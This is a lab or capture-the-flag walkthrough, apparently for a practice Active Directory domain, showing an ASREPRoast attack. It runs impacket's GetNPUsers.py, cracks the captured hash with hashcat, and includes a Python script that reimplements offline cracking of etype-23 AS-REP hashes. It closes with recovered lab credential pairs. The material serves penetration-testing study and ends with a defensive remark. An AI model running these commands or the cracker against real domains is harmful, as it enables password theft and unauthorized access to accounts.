Exploiting Username - ASREPRoast



The ASREPRoast attack targets accounts that have the "Do not require Kerberos preauthentication" flag set (UF_DONT_REQUIRE_PREAUTH, shown as DONT_REQ_PREAUTH by PowerView and BloodHound; bit 0x400000 = 4194304 of userAccountControl).

With pre-authentication disabled, anyone can send an AS-REQ to the DC on behalf of such a user and get an AS-REP back. The enc-part of that AS-REP is encrypted with the user's long-term key, which is derived from the password (for etype 23, RC4-HMAC, the key is simply the NT hash). The response can therefore be taken offline and the password recovered by trying candidates until one decrypts it correctly.

No domain account is needed for this attack, only network access to the DC's Kerberos service (port 88). Without credentials, though, the usernames have to be guessed or enumerated first (see the previous sections). With a domain account, an LDAP query on the userAccountControl bit (matching rule 1.2.840.113556.1.4.803 with value 4194304) lists every such user directly; GetNPUsers.py runs that query itself when given credentials instead of -usersfile.

ASREP - roasting

We create a users.txt file with all the usernames previously found on north.newyork.local (see the user enumeration sections):

cat users.txt

Administrator
vagrant
krbtgt
newyork$
pablo.Sandoval
fernando.Alonzo
valentino.alcantara
matias.Almonte
alejandro.Rodriguez
claudio.Ortiz
salvador.Aguilar
pacofish
elena.Lopez
miguel.Cabrera
joel.exposito
sql_svc

We can now try AS-REP roasting every user in the list with impacket's GetNPUsers.py:

GetNPUsers.py north.newyork.local/ -no-pass -usersfile users.txt
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra


[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User newyork$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pablo.Sandoval doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fernando.Alonzo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User valentino.alcantara doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User matias.Almonte doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alejandro.Rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:da4d51f644d3ecb45e27f06ece85208a$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
[-] User salvador.Aguilar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pacofish doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User elena.Lopez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User miguel.Cabrera doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User joel.exposito doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set


  • Only claudio.Ortiz has pre-authentication disabled, so the DC returns an AS-REP for that account and GetNPUsers prints it in hashcat/john format. Every other account answers with KDC_ERR_PREAUTH_REQUIRED and is reported as not having UF_DONT_REQUIRE_PREAUTH set. The KDC_ERR_CLIENT_REVOKED line belongs to krbtgt, which is disabled by default, so the KDC rejects it before pre-authentication is even considered.

  • The blob is different on every request (the KDC picks a fresh confounder and session key each time), which is why the hash cracked below does not match the one printed above; any single capture cracks to the same password.

  • Cracking should be done on your own machine (ideally with a GPU), not inside the lab.


#copy rockyou.txt.gz to your current directory (cp rather than mv, so the system wordlist stays in place)
sudo cp /usr/share/wordlists/rockyou.txt.gz .

#unzip rockyou.txt.gz
gzip -d rockyou.txt.gz

#let's start cracking: -m 18200 selects the AS-REP etype 23 format, -a 0 is a plain wordlist attack.
#the hash is single-quoted because it contains '$'. With several hashes, write them to a file instead
#(GetNPUsers.py ... -format hashcat -outputfile asrep.hashes) and give hashcat the file in place of the literal.
hashcat -m 18200 '$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$...' -a 0 rockyou.txt

-m = hash mode (18200 | Kerberos 5, etype 23, AS-REP)
-a = --attack-mode (0 | Straight, 1 | Combination, 3 | Brute-force, 6 | Hybrid Wordlist + Mask, 7 | Hybrid Mask + Wordlist). A wordlist needs -a 0. The run captured below was started with -a 3, which makes hashcat read rockyou.txt as a list of masks; it still found the password only because "babyboy" contains no mask characters, hence the Guess.Mask line in the output.




$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$f07b53f1af9ef89392c6097c8c60e95a400040b4ec23c986fc96d4b0dca59978cd5d2c917667a2ff6f0acb292df72360ba334a8153bd686b29245af993a268927a3b8b2317933802ff9360ddb86b503de8ee7f0917302c699f1e3819c7ffe65d989dc1e0925cc5baf62cbc083920f043a18bbb2a397fc72cfc9944e7d0167040588ce708aedca46d1e66d0b398e647c3158e8c69b5e8fa19a23ff1c7f4517a6f6210ceb5e2eccc6f520180303daaaa2dbeaf1e16c55cca50ea3db870b521cc8c14a51f3c6fc4f31766c6aa328c596380f417d82d78c31047e20ed6a29cdc6d34dafd8d83cf57582e5b4a3a04a14c4490f55be11c239f8c121306:babyboy
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e7...121306
Time.Started.....: Wed Feb 22 08:32:49 2023 (0 secs)
Time.Estimated...: Wed Feb 22 08:32:49 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: babyboy [7]
Guess.Queue......: 286/14336793 (0.00%)
Speed.#1.........:    10958 H/s (0.01ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: babyboy -> babyboy
Hardware.Mon.#1..: Util: 46%

Started: Wed Feb 22 08:32:23 2023
Stopped: Wed Feb 22 08:32:50 2023
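What hashcat is doing for each of those candidates is cheap to reproduce, and seeing it makes clear why the attack is entirely offline and why etype 23 hashes fall so fast. The script below is an added example (not code from the original page, impacket or hashcat): it rebuilds the etype 23 check from the RFC 4757 primitives, parses a `$krb5asrep$23$...` line in the layout GetNPUsers.py prints, and runs a small wordlist against it. The account demo.user@DEMO.LOCAL, the password Winter2023!, the wordlist and the stand-in EncASRepPart bytes are all constructed for the example, and the enc-part is generated locally, so nothing talks to a DC. The key usage value 8 is an assumption taken from the hashcat/john implementations of this format.

```python
"""What hashcat -m 18200 checks per candidate: RC4-HMAC (etype 23) AS-REP decryption.
Added example, not code from the page, impacket or hashcat. Everything is constructed:
DEMO_USER/DEMO_REALM/DEMO_PASSWORD, the stand-in EncASRepPart bytes and the wordlist are
made up, and the enc-part is produced locally with the RFC 4757 primitives (no DC needed)."""
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
# Assumption taken from the hashcat/john krb5asrep implementations: Windows encrypts
# the RC4-HMAC AS-REP enc-part under key usage 8, not the generic usage 3 of RFC 4120.
AS_REP_KEY_USAGE = 8
hmac_md5 = lambda key, data: hmac.new(key, data, hashlib.md5).digest()

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    f = lambda x, y, z: (x & y) | (~x & MASK32 & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in rounds:
            for j, i in enumerate(order):
                a = rol((a + fn(b, c, d) + words[i] + k) & MASK32, shifts[j % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))   # NT hash; for etype 23 this is the Kerberos key

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                        # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                           # keystream XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 encryption: returns checksum || RC4(K3, confounder || plaintext)."""
    confounder = os.urandom(8) if confounder is None else confounder
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)               # K2 == K1 for non-export keys
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)

def to_hashcat_18200(user: str, realm: str, enc_part: bytes) -> str:
    # Same layout GetNPUsers.py prints: $krb5asrep$23$user@REALM:checksum$edata
    return f"$krb5asrep$23${user}@{realm}:{enc_part[:16].hex()}${enc_part[16:].hex()}"

def parse_hashcat_18200(line: str):
    head, _, body = line.strip().partition(":")
    fields = head.split("$")                    # ['', 'krb5asrep', '23', 'user@REALM']
    if len(fields) != 4 or fields[1] != "krb5asrep" or fields[2] != "23":
        raise ValueError("not an etype-23 $krb5asrep$ line")
    checksum_hex, _, edata_hex = body.partition("$")
    return fields[3], bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)

def check_password(line: str, password: str) -> bool:
    """Decrypt the enc-part with the candidate's NT hash and verify the HMAC-MD5."""
    _, checksum, edata = parse_hashcat_18200(line)
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", AS_REP_KEY_USAGE))
    k3 = hmac_md5(k1, checksum)
    plaintext = rc4(k3, edata)                  # confounder || EncASRepPart
    # hashcat shortcuts this by testing the ASN.1 header of the decrypted bytes;
    # the full HMAC compare is the authoritative check and costs only one more MD5.
    return hmac.compare_digest(hmac_md5(k1, plaintext), checksum)

def crack(line: str, wordlist):
    """Return the first candidate that decrypts the AS-REP, or None."""
    for candidate in wordlist:
        if check_password(line, candidate):
            return candidate
    return None

# Constructed fixture: made-up account and password, a stand-in for the ASN.1
# EncASRepPart, and a fixed confounder so DEMO_LINE is reproducible.
DEMO_USER, DEMO_REALM, DEMO_PASSWORD = "demo.user", "DEMO.LOCAL", "Winter2023!"
FAKE_ENC_AS_REP_PART = b"\x79\x81\xc0" + bytes(32)
DEMO_LINE = to_hashcat_18200(DEMO_USER, DEMO_REALM, rc4_hmac_encrypt(
    nt_hash(DEMO_PASSWORD), AS_REP_KEY_USAGE, FAKE_ENC_AS_REP_PART, confounder=bytes(range(8))))
DEMO_WORDLIST = ["password", "babyboy", "ilovebaseball", "Winter2023!", "Summer2023!"]

if __name__ == "__main__":
    print(DEMO_LINE)
    print("cracked:", crack(DEMO_LINE, DEMO_WORDLIST))
```

Per candidate the cost is one MD4 (the NT hash), three HMAC-MD5 and one RC4 pass over a few hundred bytes, which is why etype 23 AS-REP hashes crack at tens of thousands of guesses per second even on a CPU. If the account only had AES keys (etypes 17/18), every candidate would instead cost a PBKDF2-HMAC-SHA1 derivation with 4096 iterations, so as a defender, disabling RC4 on the account or domain is worth doing even where pre-authentication cannot be switched back on.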


We now have two sets of credentials:

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy